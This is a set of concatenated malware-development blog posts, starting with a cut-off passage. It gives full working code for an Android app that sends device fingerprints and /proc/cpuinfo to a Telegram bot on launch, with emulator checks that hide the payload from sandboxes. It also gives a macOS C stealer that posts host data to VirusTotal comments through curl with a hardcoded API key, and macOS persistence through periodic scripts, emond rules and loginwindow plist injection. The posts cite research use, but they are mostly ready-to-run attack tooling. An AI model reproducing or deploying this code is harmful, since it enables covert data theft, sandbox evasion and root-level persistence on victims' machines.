The if (!cpuinfo.exists()) check is worth noting. A hardened sandbox could theoretically hide /proc/cpuinfo. If that happens, the function still reports back to the attacker with a not found message - useful telemetry either way.

To exfiltrate /proc/cpuinfo to Telegram, you need to handle the 4096 character limit per message. If the file is larger, the Telegram API will return an error (400 Bad Request as I know):

private val tgLimit = 4000

Other functions remained unchanged. For example, getDeviceName() reads all the Build constants and formats them into one string. Honestly, these fields are the other half of the emulator fingerprint - things like Build.HARDWARE (goldfish on AVD), Build.FINGERPRINT (starts with generic/ on every emulator), Build.TYPE (userdebug or eng on emulators, user on retail devices), Build.HOST (android-build on AOSP machines), and Build.getRadioVersion() which returns 1.0.0.0 on emulators because there is no real modem:

private fun getDeviceName(): String {
    fun capitalize(s: String?): String {
        if (s.isNullOrEmpty()) {
            return ""
        }
        val first = s[0]
        return if (Character.isUpperCase(first)) {
            s
        } else {
            first.uppercaseChar().toString() + s.substring(1)
        }
    }

    val manufacturer = Build.MANUFACTURER
    val model = Build.MODEL
    val device = Build.DEVICE
    val deviceID = Build.ID
    val brand = Build.BRAND
    val hardware = Build.HARDWARE
    val hostInfo = Build.HOST
    val userInfo = Build.USER
    val board = Build.BOARD
    val display = Build.DISPLAY
    val fingerprint = Build.FINGERPRINT
    val devT = Build.TYPE
    val radio = Build.getRadioVersion()

    val info = "Hardware: ${capitalize(hardware)}\n" +
            "Manufacturer: ${capitalize(manufacturer)}\n" +
            "Model: ${capitalize(model)}\n" +
            "Device: ${capitalize(device)}\n" +
            "ID: ${capitalize(deviceID)}\n" +
            "Brand: ${capitalize(brand)}\n" +
            "Host: ${capitalize(hostInfo)}\n" +
            "User: ${capitalize(userInfo)}\n" +
            "Board: ${capitalize(board)}\n" +
            "Display: ${capitalize(display)}\n" +
            "Fingerprint: ${capitalize(fingerprint)}\n" +
            "Build TYPE: ${capitalize(devT)}\n" +
            "RADIO: ${capitalize(radio)}"

    return info
}

Then sendTextMessage() appends the full Build snapshot to the message and POSTs it asynchronously to the attacker’s Telegram bot via OkHttp. The bot token and chat ID are stored in assets/token.txt and assets/id.txt - putting credentials in assets is a common trick in commodity Android malware because the files survive repackaging and are harder to spot than hardcoded strings:

fun sendTextMessage(message: String) {
    val token      = getTokenFromAssets()
    val chatId     = getChatIdFromAssets()
    val deviceInfo = getDeviceName()
    val meow       = "Meow! ♥\uFE0F"
    val messageToSend = "$message\n\n$deviceInfo\n\n$meow\n\n"

    val requestBody = FormBody.Builder()
        .add("chat_id", chatId)
        .add("text", messageToSend)
        .build()

    val request = Request.Builder()
        .url("https://api.telegram.org/bot$token/sendMessage")
        .post(requestBody)
        .build()

    // send the request asynchronously using OkHttp
    client.newCall(request).enqueue(object : Callback {
        override fun onFailure(call: Call, e: IOException) {
            e.printStackTrace()
        }

        override fun onResponse(call: Call, response: Response) {
            if (response.isSuccessful) {
                println("Message sent successfully: ${response.body?.string()}")
            } else {
                println("Error: ${response.body?.string()}")
            }
        }
    })
}

private fun getTokenFromAssets(): String {
    return context.assets.open("token.txt").bufferedReader().readText().trim()
}

private fun getChatIdFromAssets(): String {
    return context.assets.open("id.txt").bufferedReader().readText().trim()
}

So the full source code of HackNetwork.kt looks like this:

package cocomelonc.hackcpu

import android.util.Log
import android.content.Context
import android.os.Build
import android.widget.Toast
import okhttp3.Call
import okhttp3.Callback
import okhttp3.FormBody
import okhttp3.OkHttpClient
import okhttp3.Request
import okhttp3.Response
import java.io.IOException

import java.io.File
import java.io.BufferedReader
import java.io.InputStreamReader

class HackNetwork(private val context: Context) {

    private val client = OkHttpClient()
    private val tgLimit = 4000

    // Function to send message using OkHttp
    fun sendTextMessage(message: String) {
        val token = getTokenFromAssets()
        val chatId = getChatIdFromAssets()
        val deviceInfo = getDeviceName()
        val meow = "Meow! ♥\uFE0F"
        val messageToSend = "$message\n\n$deviceInfo\n\n$meow\n\n"

        val requestBody = FormBody.Builder()
            .add("chat_id", chatId)
            .add("text", messageToSend)
            .build()

        val request = Request.Builder()
            .url("https://api.telegram.org/bot$token/sendMessage")
            .post(requestBody)
            .build()

        // Send the request asynchronously using OkHttp
        client.newCall(request).enqueue(object : Callback {
            override fun onFailure(call: Call, e: IOException) {
                e.printStackTrace()
            }

            override fun onResponse(call: Call, response: Response) {
                if (response.isSuccessful) {
                    // Handle success
                    println("Message sent successfully: ${response.body?.string()}")
                } else {
                    println("Error: ${response.body?.string()}")
                }
            }
        })
    }

    // reads cpuinfo and sends it in chunks
    fun logcpuinfo() {
        val cpuinfo = File("/proc/cpuinfo")
        val TAG = "HACK"

        if (!cpuinfo.exists()) {
            sendTextMessage("[-] /proc/cpuinfo not found")
            return
        }

        try {
            // read the whole file content
            val fullContent = cpuinfo.readText()
            val dataToSend = fullContent + "\nmeow =^..^="

            // split into chunks if length exceeds limit
            if (dataToSend.length <= tgLimit) {
                sendTextMessage(dataToSend)
            } else {
                var start = 0
                while (start < dataToSend.length) {
                    val end = minOf(start + tgLimit, dataToSend.length)
                    val chunk = dataToSend.substring(start, end)

                    // send current chunk
                    sendTextMessage(chunk)
                    start += tgLimit

                    // small delay to prevent telegram rate limiting (429)
                    Thread.sleep(500)
                }
            }
            Log.i(TAG, "[+] exfiltration to telegram complete. meow =^..^=")

        } catch (e: Exception) {
            Log.e(TAG, "[x] error during exfiltration: ${e.message}")
            sendTextMessage("[x] error reading cpuinfo: ${e.message}")
        }
    }


    // Get device info
    private fun getDeviceName(): String {
        fun capitalize(s: String?): String {
            if (s.isNullOrEmpty()) {
                return ""
            }
            val first = s[0]
            return if (Character.isUpperCase(first)) {
                s
            } else {
                first.uppercaseChar().toString() + s.substring(1)
            }
        }

        val manufacturer = Build.MANUFACTURER
        val model = Build.MODEL
        val device = Build.DEVICE
        val deviceID = Build.ID
        val brand = Build.BRAND
        val hardware = Build.HARDWARE
        val hostInfo = Build.HOST
        val userInfo = Build.USER
        val board = Build.BOARD
        val display = Build.DISPLAY
        val fingerprint = Build.FINGERPRINT
        val devT = Build.TYPE
        val radio = Build.getRadioVersion()

        val info = "Hardware: ${capitalize(hardware)}\n" +
                "Manufacturer: ${capitalize(manufacturer)}\n" +
                "Model: ${capitalize(model)}\n" +
                "Device: ${capitalize(device)}\n" +
                "ID: ${capitalize(deviceID)}\n" +
                "Brand: ${capitalize(brand)}\n" +
                "Host: ${capitalize(hostInfo)}\n" +
                "User: ${capitalize(userInfo)}\n" +
                "Board: ${capitalize(board)}\n" +
                "Display: ${capitalize(display)}\n" +
                "Fingerprint: ${capitalize(fingerprint)}\n" +
                "Build TYPE: ${capitalize(devT)}\n" +
                "RADIO: ${capitalize(radio)}"

        return info
    }

    // Fetch token and chatId from assets (assuming these are saved in files)
    private fun getTokenFromAssets(): String {
        return context.assets.open("token.txt").bufferedReader().readText().trim()
    }

    private fun getChatIdFromAssets(): String {
        return context.assets.open("id.txt").bufferedReader().readText().trim()
    }
}

demo

Let’s go to see everything in action. Deploy and run on the emulator (AVD):

Open Logcat and filter by tag HACK - you will see the message:

[+] exfiltration to telegram complete. meow =^..^=

The Telegram bot already received the full /proc/cpuinfo snapshot on startup, before the user touched anything:

If we add some additional logic for full logging, something like the following:

try {
    // use foreach to process the file line by line efficiently
    cpuinfo.bufferedReader().useLines { lines ->
        lines.forEach { line ->
            // we log every line to see the full hardware picture
            Log.i(TAG, "[*] $line")
        }
    }
    Log.i(TAG, "[+] hardware profiling complete. meow =^..^=")
} catch (e: Exception) {
    Log.i(TAG, "[x] error reading cpuinfo: ${e.message}")
}

Open Logcat and filter by tag HACK - you will see every line of /proc/cpuinfo printed one by one:

The Hardware line says Ranchu and the processor block contains Android virtual processor - dead giveaways that we are inside an emulator:

Notice Fingerprint starts with generic/ or Google/sdk_gphone64_x86_64/emu64xa, Build TYPE is user, and RADIO is 1.0.0.0. On a real device these look completely different.

Also build apk:

Then deploy and run on a real physical device (On my Motorola g54 5G):

As you can see, everything is worked perfectly! =^..^=

Now upload the APK to ANY.RUN for sandbox analysis.

Select the Android device profile:

Then just wait:

ANY.RUN catches the Telegram network traffic and flags it with telegram tag:

But finally, as you can see ANY.RUN says, No threats detected:

https://app.any.run/tasks/0e584837-135b-407d-997e-f54b0715eb1a

adding a decision gate

Collecting the data is useful for reconnaissance, but the real use in malware is gating the payload on it. Here is a minimal isEmulator() function that combines both checks - Build constants first (no file I/O), then /proc/cpuinfo as a cross-check:

fun isEmulator(): Boolean {
    if (Build.FINGERPRINT.startsWith("generic")
        || Build.HARDWARE.startswith("Ranchu")
        || Build.FINGERPRINT.startsWith("unknown")
        || Build.MODEL.contains("google_sdk")
        || Build.MODEL.contains("gphone64_x86_64")
        || Build.MODEL.contains("Emulator")
        || Build.MODEL.contains("Android SDK built for x86")
        || Build.MANUFACTURER.contains("Genymotion")
        || Build.BRAND.startsWith("generic")
        || Build.DEVICE.startsWith("generic")
        || Build.DEVICE.startsWith("Emu64")
        || Build.TYPE == "eng"
    ) {
        return true
    }

    return try {
        val cpuinfo = File("/proc/cpuinfo").readText()
        cpuinfo.contains("goldfish", ignoreCase = true)
            || cpuinfo.contains("ranchu",   ignoreCase = true)
            || cpuinfo.contains("vbox86",   ignoreCase = true)
            || cpuinfo.contains("QEMU",     ignoreCase = true)
    } catch (_: Exception) {
        false
    }
}

This is certainly not a bulletproof function example, it can be more complex usually :)

Call isEmulator() at the top of onCreate. If it returns true, show benign behaviour - the sandbox never sees the real payload execute.

why this is interesting?

First of all, reading /proc/cpuinfo and Build constants requires zero dangerous permissions. The user sees nothing unusual in the permission dialog and the OS never prompts them about it.

The hardware profile the attacker receives is immediately actionable: they can see whether the device is a real phone or a sandbox, the exact SoC and OEM, and whether the build is a debug or production image. That is enough to decide whether to send a targeted follow-up payload or stay quiet.

This is a practical example for Android developers, malware researchers, blue teamers, red teamers, and threat hunters to understand how adversaries fingerprint analysis environments before releasing their payload.

Thanks to ANY.RUN for API!

Telegram Bot API
Mobile malware development trick 1
Mobile malware development trick 2
stealing data via legit Telegram API. Windows example
stealing data via legit Telegram API. Mac OS X example
okhttp
ANY.RUN
ANY.RUN: app-release.apk
source code in github

Thanks for your time happy hacking and good bye! PS. All drawings and screenshots are mine

MacOS malware persistence 8: periodic scripts. Simple C example

2026-04-02T00:00:00+00:00

﷽

Hello, cybersecurity enthusiasts and white hackers!

This post is quick observation of classic trick. Today, we are going back to the roots - specifically, the BSD roots of macOS. We will explore a legacy maintenance system that is often overlooked by modern security tools: the periodic system.

concept: periodic

macOS, being a Unix-based system, inherited the periodic utility from BSD. Its primary purpose is to run system maintenance tasks at regular intervals: daily, weekly, and monthly.

These tasks are managed by the periodic command, which scans specific directories for executable scripts:

ls -l /etc/periodic

The most interesting part for us? These scripts are executed as root.

Unlike LaunchAgents or Login Items, adding a script here does not trigger any “background item added” notifications in macOS (like Monterey in my case). It is a silent, high-privilege execution point that survives reboots and system updates.

practical example

For our PoC, I will create a simple C “malware” with system info as usual. Also, its goal is to prove that it is running with root privileges by writing its UID and the current timestamp to a log file in a shared directory, like the this (hack.c):

/*
 * hack.c
 * payload for periodic script persistence
 * author: @cocomelonc
 */

#include 
#include 
#include 
#include 

int main() {
  // define the log path
  const char *log_path = "/Users/Shared/meow.txt";

  // systeminfo
  char command[1024];
  snprintf(command, sizeof(command), "/usr/sbin/system_profiler SPSoftwareDataType > %s 2>&1", log_path);
  system(command);
  
  // perform the "malicious" action (logging)
  FILE *f = fopen(log_path, "a");
  if (f) {
    time_t now = time(NULL);
    fprintf(f, "[=^..^=] meow! periodic persistence triggered.\n");
    fprintf(f, "timestamp: %s", ctime(&now));
    // getuid() will return 0 if the script is running as root
    fprintf(f, "running with UID: %d\n", getuid());
    fprintf(f, "-------------------------------------\n");
    fclose(f);
  }

  return 0;
}

And we need, wrapper for persistence. The periodic system expects executable files in its directories. Usually, these are shell scripts. We will create a small wrapper that acts as the entry point for the system’s maintenance cycle (999.meow):

#!/bin/sh
# 999.meow
# shell wrapper to execute our malicious binary
# the '999' prefix ensures it runs last in the sequence

if [ -x /usr/local/bin/meow ]; then
    /usr/local/bin/meow
fi

demo

Let’s see this trick in action.

To install this persistence, we need to place our binary in a standard execution path and our wrapper in the periodic directory. this requires sudo (simulating a privilege escalation or a high-privilege installer).

compile our “malware”:

clang -o meow hack.c

Then, move the binary to a common system path, we use /usr/local/bin to look like a legitimate third-party utility:

sudo cp meow /usr/local/bin/
sudo chmod +x /usr/local/bin/meow

Finally, deploy the periodic script to the daily folder, in macOS Monterey VM in my case, /etc is a symlink to /private/etc:

sudo cp 999.meow /etc/periodic/daily/
sudo chmod +x /etc/periodic/daily/999.meow

That’s all!

As I know, by default, the daily scripts run at 03:15 AM. however, we don’t want to wait until the middle of the night to verify our work. we can manually trigger the maintenance cycle using the periodic command:

sudo periodic daily

Now, let’s check our log file to see if the magic happened:

As you can see, everything works perfectly: our code was executed with UID 0 (root). we have successfully established a silent, persistent foothold in the system. =^..^=

But we have the caveat: Apple has been systematically removing legacy BSD tools:

periodic scripts are not as common as LaunchAgents because they require root privileges to install. Therefore, they are typically used by high-end APT groups as a secondary, “deep” persistence mechanism after they have already escalated privileges.

I hope this post is useful for malware R&D and red teaming labs, Apple/Mac researchers, and blue team specialists.

macOS hacking part 1
macOS persistence part 1
macOS persistence part 7
source code in github

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

MacOS malware persistence 9: emond (The Event Monitor Daemon). Simple C example

2026-04-02T00:00:00+00:00

﷽

Hello, cybersecurity enthusiasts and white hackers!

In our previous posts, we explored session restoration, environment variables, and periodic scripts. Today, we are diving into one of the most obscure and powerful legacy persistence mechanisms in macOS history: emond (The Event Monitor Daemon).

emond

What is the main concept? emond is a service that was designed to monitor system events (like startup, login, or specific log messages) and execute defined actions based on those events. It is controlled by the system’s launchd and runs with root privileges.

The daemon looks for rules in a specific directory:

ls -l /private/etc/emond.d/rules/

By dropping a specially crafted .plist file into this folder, we can instruct the system to execute our malicious payload whenever a specific trigger occurs - most commonly, during system startup.

practical example

As usual, my “malware” is a simple C program that proves our persistence is working by writing to a log file in /Users/Shared/. Since emond executes actions as root, our log will show a UID of 0. Something like the following hack.c.

/*
 * hack.c
 * "malware" for emond persistence
 * author: @cocomelonc
 */

#include 
#include 
#include 
#include 

int main() {
  // define the log path
  const char *log_path = "/Users/Shared/meow.txt";

  // systeminfo
  char command[1024];
  snprintf(command, sizeof(command), "/usr/sbin/system_profiler SPSoftwareDataType > %s 2>&1", log_path);
  system(command);
  
  // perform the "malicious" action (logging)
  FILE *f = fopen(log_path, "a");
  if (f) {
    time_t now = time(NULL);
    fprintf(f, "[=^..^=] meow! emond persistence triggered.\n");
    fprintf(f, "timestamp: %s", ctime(&now));
    // getuid() will return 0 if the script is running as root
    fprintf(f, "running with UID: %d\n", getuid());
    fprintf(f, "-------------------------------------\n");
    fclose(f);
  }

  return 0;
}

Then, we need a configuration file that emond can parse. This rule specifies that upon the startup event, the system should run our command. To create a rule file, we will use the SampleRule.plist file that already exists and modify it as necessary.

Something like this meow.plist:

 version="1.0">

    name
    meow_persistence
    enabled
    
    eventTypes
    
      startup
    
    actions
    
        type
        RunCommand
        command
        /usr/local/bin/meow_emond
        user
        root

As you can see, everything is simple.

demo

Let’s check everythin in action. Compile our “malware”:

clang -o meow_emond hack.c

To setup persistence logic, we need to move our files into the correct locations. This requires administrative privileges:

sudo cp meow_emond /usr/local/bin/

then, move our rule:

sudo cp meow.plist /private/etc/emond.d/rules/meow.plist

finally, just reboot our Monterey VM. Upon boot, emond will scan the rules folder, see our meow.plist, and execute the command.

In some macOS Monterey versions, the emond service might be dormant. To activate it and trigger our persistence, we use launchctl.

Check our file:

cat /Users/Shared/meow.txt

As you can see, everything works perfect as expected! =^..^=

If you are running a macOS Monterey VM, you are in luck. While Apple began phasing out emond in Big Sur, the binary and its logic often remain functional in Monterey, making it a perfect target for “ghost” persistence.

But one more caveat.

While writing this research, I discovered that in some macOS Monterey, Apple finally pulled the plug on emond. Even if you find the .plist file, the system throws an Input/output error. This is a prime example of Attack Surface Reduction: Apple realized they couldn’t secure this event-driven monster, so they simply deleted it.

Even “Load failed” is a result in Mac malware research.

I hope this post is useful for malware R&D and red teaming labs, Apple/Mac researchers, and blue team specialists.

macOS hacking part 1
macOS persistence part 1
macOS persistence part 8
source code in github

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

MacOS hacking part 13: sysinfo stealer via VirusTotal API. Simple C example

2026-04-01T00:00:00+00:00

﷽

Hello, cybersecurity enthusiasts and white hackers!

In the first post from this series, we explored how to steal data on macOS via Telegram API. Today we will look at another fast exfiltration technique: using the VirusTotal API as a covert channel.

practical example

Most corporate firewalls and EDRs are trained to block connections to unknown or “suspicious” domains. However, domains related to security research - like virustotal.com are almost always whitelisted.

This is the same as before for Windows: abusing the VirusTotal API’s “comments” feature, we can post stolen data as a comment on an existing file hash.

So, we need function like the following:

// send data to VirusTotal using the system's curl
int send_to_vt(const char *message) {
  char command[8192];
  char json_body[4096];

  // sanitize message: replace newlines with spaces for JSON safety
  char sanitized[4096];
  strncpy(sanitized, message, sizeof(sanitized) - 1);
  for (int i = 0; sanitized[i]; i++) {
    if (sanitized[i] == '\n' || sanitized[i] == '\r' || sanitized[i] == '"') {
      sanitized[i] = ' ';
    }
  }

  // construct the JSON payload for VT API v3
  snprintf(json_body, sizeof(json_body), 
       "{\"data\": {\"type\": \"comment\", \"attributes\": {\"text\": \"%s\"}}}", 
       sanitized);

  // build the curl command
  // we use -s for silent, -X POST, and provide the API key in the header
  snprintf(command, sizeof(command),
       "curl -s -X POST \"https://www.virustotal.com/api/v3/files/%s/comments\" "
       "-H \"x-apikey: %s\" "
       "-H \"Content-Type: application/json\" "
       "-d '%s'",
       FILE_ID, VT_API_KEY, json_body);

  printf("stealing data via VirusTotal...\n");
  int result = system(command);
  return result;
}

As you can see, for simplicity and compatibility I used curl:

Since it is a signed Apple binary, it bypasses many basic application-level firewalls.

The full source code looks like the following (hack.c):

/*
 * hack.c
 * macOS system info stealer 
 * via VirusTotal API (comments)
 * author: @cocomelonc
 * https://cocomelonc.github.io/macos/2026/04/01/malware-mac-13.html
 */

#include 
#include 
#include 
#include 
#include 
#include 

#define VT_API_KEY "7e7778f8c29bc4b171512caa6cc81af63ed96832f53e7e35fb706dd320ab8c42"
#define FILE_ID "379698a4f06f18cb3ad388145cf62f47a8da22852a08dd19b3ef48aaedffd3fa"

// helper function to get system strings from sysctl
void get_sysctl_value(const char *name, char *output, size_t size) {
  size_t len = size;
  if (sysctlbyname(name, output, &len, NULL, 0) != 0) {
    strncpy(output, "unknown", size);
  }
}

// send data to VirusTotal using the system's curl
int send_to_vt(const char *message) {
  char command[8192];
  char json_body[4096];

  // sanitize message: replace newlines with spaces for JSON safety
  char sanitized[4096];
  strncpy(sanitized, message, sizeof(sanitized) - 1);
  for (int i = 0; sanitized[i]; i++) {
    if (sanitized[i] == '\n' || sanitized[i] == '\r' || sanitized[i] == '"') {
      sanitized[i] = ' ';
    }
  }

  // construct the JSON payload for VT API v3
  snprintf(json_body, sizeof(json_body), 
       "{\"data\": {\"type\": \"comment\", \"attributes\": {\"text\": \"%s\"}}}", 
       sanitized);

  // build the curl command
  // we use -s for silent, -X POST, and provide the API key in the header
  snprintf(command, sizeof(command),
       "curl -s -X POST \"https://www.virustotal.com/api/v3/files/%s/comments\" "
       "-H \"x-apikey: %s\" "
       "-H \"Content-Type: application/json\" "
       "-d '%s'",
       FILE_ID, VT_API_KEY, json_body);

  printf("stealing data via VirusTotal...\n");
  int result = system(command);
  return result;
}

int main() {
  char hostname[256];
  char model[256];
  char os_version[256];
  char cpu_brand[256];
  char serial_num[256];
  int n_cpu = 0;
  size_t n_cpu_size = sizeof(n_cpu);

  // collect hardware and system information
  gethostname(hostname, sizeof(hostname));
  get_sysctl_value("hw.model", model, sizeof(model));
  get_sysctl_value("kern.osproductversion", os_version, sizeof(os_version));
  get_sysctl_value("machdep.cpu.brand_string", cpu_brand, sizeof(cpu_brand));
  sysctlbyname("hw.ncpu", &n_cpu, &n_cpu_size, NULL, 0);

  // format the data block
  char exfil_data[4096];
  snprintf(exfil_data, sizeof(exfil_data),
       "macOS -> host: %s | model: %s | OS: %s | CPU: %s | cores: %d",
       hostname, model, os_version, cpu_brand, n_cpu);

  // send to VirusTotal
  int status = send_to_vt(exfil_data);

  if (status == 0) {
    printf("system info successfully posted to VT comments. meow =^..^=\n");
  } else {
    printf("exfiltration failed.\n");
  }

  return 0;
}

The C code only uses standard libraries and sysctl. There are no suspicious network-related function imports (like socket or connect ???) in our binary’s symbol table.

demo

Let’s see everything in action. Compile it on my macOS Sonoma VM research machine:

clang -o hack hack.c

Then run:

./hack

Now, if we visit the VirusTotal page for the file ID, we will see our machine’s hardware profile in the “Comments” tab:

https://www.virustotal.com/gui/file/379698a4f06f18cb3ad388145cf62f47a8da22852a08dd19b3ef48aaedffd3fa/community

As you can see, everything worked perfectly, as expected! =^..^=

But the coolest thing is that ANY.RUN announced a Sandbox for macOS!

But need to request access from ANY.RUN team first.

Abusing legitimate APIs like VirusTotal or Telegram for exfiltration is a powerful tactic. It turns the defender’s own tools against them. By blending in with legitimate security traffic, our malware can operate under the radar of most SOC teams.

I hope this post is useful for malware R&D and red teaming labs, Apple/Mac researchers, and blue team specialists.

Thanks to ANY.RUN for API!

Ready for macOS Threats: Expanding Your SOC’s Cross-Platform Analysis with ANY.RUN
macOS hacking part 1
macOS hacking part 12
source code in github

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

MacOS malware persistence 7: Re-opened applications. Simple C example

2026-03-29T00:00:00+00:00

﷽

Hello, cybersecurity enthusiasts and white hackers!

In our previous posts, we discussed various ways to achieve persistence on macOS. Today, we are diving into a mechanism that is part of the native macOS user experience: TAL (Transparent App Laundering), specifically the Re-opened Applications feature.

When you log out or restart your Mac, you usually see a checkbox: “Re-open windows when logging back in.”

If this is checked, macOS takes a snapshot of your current session and restores it upon your return. As malware developers, we can abuse this “snapshot” to ensure our payload is launched every time the user logs in.

the concept

The state of the session is managed by the loginwindow process. It stores the list of applications to be restored in a specific property list (.plist) file located in the user’s ByHost directory.

The file path follows this pattern:

~/Library/Preferences/ByHost/com.apple.loginwindow..plist

Inside this file, there is an array called TALApps. By injecting our application’s bundle ID and path into this array, we tell loginwindow that our malware was “open” and needs to be “restored.”

practical example 1

For this trick to work, we need an application that behaves like a background process. We will use a C program that logs its execution to /Users/Shared/.

Something like this:

/*
 * hack.c
 * malicious app for macOS persistence
 * for re-opened applications
 * author: @cocomelonc
 */

#include 
#include 
#include 
#include 

int main() {
  // try writing to /Users/Shared/
  char *filePath = "/Users/Shared/meow.txt";
  FILE *f = fopen(filePath, "a");
  if (f) {
    time_t now = time(NULL);
    fprintf(f, "meow-meow! uid: %d\n", getuid());
    fprintf(f, "meow-meow! time: %s", ctime(&now));
    fclose(f);
  }
  return 0;
}

There is a critical nuance: for the TAL mechanism to actually save our app into the next session’s snapshot, the app must be running at the exact moment the user clicks “Log Out.” If the app has already finished its execution, macOS will simply ignore it (hack.c):

/*
 * hack.c
 * malicious app for macOS persistence (TAL method)
 * author: @cocomelonc
 */

#include 
#include 
#include 
#include 

void log_meow() {
  char *filePath = "/Users/Shared/meow.txt";
  FILE *f = fopen(filePath, "a");
  if (f) {
    time_t now = time(NULL);
    fprintf(f, "meow-meow! uid: %d\n", getuid());
    fprintf(f, "meow-meow! time: %s\n", ctime(&now));
    fclose(f);
  }
}

int main() {
  // perform the action
  log_meow();

  /* 
   * critical:
   * the app must be active during logout to be captured in the TAL snapshot.
   * option A: sleep(1000); - stays alive for a while.
   * option B: while(1) { sleep(60); } - stays alive indefinitely as a background bot.
   */
  
  while(1) {
    sleep(60);
  }

  return 0;
}

Since we are building a background process, we don’t want an icon jumping in the Dock. We use the LSBackgroundOnly key to stay invisible (Info.plist):

 version="1.0">

  CFBundleExecutable
  meow
  CFBundleIdentifier
  com.cocomelonc.meow
  CFBundlePackageType
  APPL
  LSBackgroundOnly
  

demo 1. first try

Let’s see everything in action. Step by step.

First of all, we need to packaging the bundle. We need to compile the code and organize it into a proper .app structure.

mkdir -p /tmp/meow.app/Contents/MacOS

clang hack.c -o /tmp/meow.app/Contents/MacOS/meow

adding the Info.plist (use the XML above):

cp ./Info.plist /tmp/meow.app/Contents/

Ad-hoc sign the bundle:

codesign -s - --force /tmp/meow.app

and move to a permissive location:

cp -rv /tmp/meow.app /Users/Shared/meow.app

Now we must perform two steps: registering the app with the system and injecting it into the preferences.

On modern macOS and VMs, use IOPlatformExpertDevice to find the UUID:

uuid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/ {print $4}')

plist_path="$HOME/Library/Preferences/ByHost/com.apple.loginwindow.$uuid.plist"

As mentioned, the app must be running. We launch it once manually (simulating the first infection run):

open /Users/Shared/meow.app

The app is now running in the background (invisible because of LSBackgroundOnly)

Finally, we add the entry to the plist:

defaults write "$plist_path" TALApps -array-add '{ "BundleID" = "com.cocomelonc.meow"; "Path" = "/Users/Shared/meow.app"; }'

Sometimes, we also call killall cfprefsd to force macOS to flush the preferences from memory to disk.

killall cfprefsd

For trigger and verification, we need Log Out of our macOS session:

If the code is correct, you will see a new entry with a timestamp corresponding to the login time. The loginwindow process saw your running meow app during logout, saved it to the TALApps list, and restarted it automatically upon login.

But this is not works for me!

demo 2. second attempt

If I look again on this command:

plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow.F89EC614-8EF3-53CD-B218-160EC51A3D70.plist

So, I need to inject into the correct Sonoma key: TALAppsToRelaunchAtLogin. Also BackgroundState 2 typically indicates a background-ready application

uuid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/ {print $4}')
plist_path="$HOME/Library/Preferences/ByHost/com.apple.loginwindow.$uuid.plist"
app_path="/Users/Shared/meow.app"
bundle_id="com.cocomelonc.meow"

defaults write "$plist_path" TALAppsToRelaunchAtLogin -array-add \
"{ 
  \"BundleID\" = \"$bundle_id\"; 
  \"Path\" = \"$app_path\"; 
  \"Hide\" = 0; 
  \"BackgroundState\" = 2; 
}"

don’t forget flush the cache:

killall cfprefsd

check running meow application:

ps aux | grep meow

Logout:

defaults read "$plist_path" TALAppsToRelaunchAtLogin

But why???

The reason our previous attempt failed is that defaults write with the -array-add flag is often unreliable for nested dictionaries in ByHost files. In our last output, defaults read showed only your app - meaning we accidentally wiped out the legitimate entries (Terminal, Finder, etc.). When macOS sees a session plist that is missing core system apps, it often treats it as corrupted and ignores it.

To make this work on my macOS Sonoma VM, I will use Python to properly parse the plist, append our entry to the existing array, and save it back as a binary XML. This is the “clean” way to do it without breaking the structure.

In other words, instead of overwriting the plist, we will:

Convert the binary .plist to a format we can manipulate.
Append our malicious dictionary to the TALAppsToRelaunchAtLogin array (?).
Force the system to reload the preferences.

practical example 3

My script uses the built-in plistlib to ensure the binary format remains intact (inject.py):

# inject.py
# surgical injection into loginwindow ByHost preferences
# author: @cocomelonc

import plistlib
import os
import subprocess
import glob

# find the correct ByHost file
path_pattern = os.path.expanduser("~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist")
files = glob.glob(path_pattern)

if not files:
    print("[-] no loginwindow plist found in ByHost")
    exit(1)

plist_path = files[0]
print(f"[*] targeting: {plist_path}")

# define our malicious entry
# BackgroundState 2 = background process
# Hide 0 = do not hide (though LSBackgroundOnly in Info.plist will handle this)
evil_app = {
    "BackgroundState": 2,
    "BundleID": "com.cocomelonc.meow",
    "Hide": 0,
    "Path": "/Users/Shared/meow.app"
}

try:
    # read the existing plist
    with open(plist_path, 'rb') as f:
        data = plistlib.load(f)

    # ensure the key exists and append our app
    if "TALAppsToRelaunchAtLogin" not in data:
        data["TALAppsToRelaunchAtLogin"] = []
    
    # check if already injected to avoid duplicates
    if not any(d.get('BundleID') == evil_app['BundleID'] for d in data["TALAppsToRelaunchAtLogin"]):
        data["TALAppsToRelaunchAtLogin"].append(evil_app)
        print("injecting meow.app into session state...")
    else:
        print("meow.app already present. skipping.")

    # 5. write back as binary plist
    with open(plist_path, 'wb') as f:
        plistlib.dump(data, f, fmt=plistlib.FMT_BINARY)

    # 6. clear the preference cache
    subprocess.run(["killall", "cfprefsd"])
    print("injection complete. meow!")

except Exception as e:
    print(f"error: {e}")

demo 3

Build our meow.app and move it to /Users/Shared/, we use the C code and Info.plist from the previous practical attempts.

Then the “active participant” rule: for Sonoma to restore the app, it is safest to have it running first:

open /Users/Shared/meow.app

run the injector:

python3 inject.py

Finally, verify with plutil again. We should see our app AT THE END of the list, keeping others intact:

plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist

Yes! Looks legit!

Now, perform a Log Out and Log In.

why this works now? First of all, we didn’t delete the Finder or Terminal entries. The system sees a valid, familiar session state. Secondly, using plistlib ensures the file is exactly what loginwindow expects (Binary XML version 1.0).
Finally, cache synchronization works! killall cfprefsd is the only way to make sure the OS doesn’t overwrite our file with its internal memory cache when we click “Log Out.”

The Re-opened Applications (TAL) method is a stealthy alternative to standard Login Items. It doesn’t require root privileges and abuses a feature that users expect to see. The trade-off is that the malware must stay alive in the background (while(1)) to ensure it’s included in the session snapshot.

This method was also documented by Patrick Wardle, in his original white paper

There’s currently no direct public report that APT groups or software used the TALAppsToRelaunchAtLogin array for persistence. OceanLotus uses the same com.apple.loginwindow.plist file, but a different key - EnvironmentVariables or LSEnvironment.

How it works? They write DYLD_INSERT_LIBRARIES there. Upon login, the system reads this file, loads their malware into all processes in the session, and they profit. Perhaps in the next posts from this series I will try to reimplement this.

I hope this post is useful for malware R&D and red teaming labs, Apple/Mac researchers, and blue team specialists.

Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved April 13, 2022.
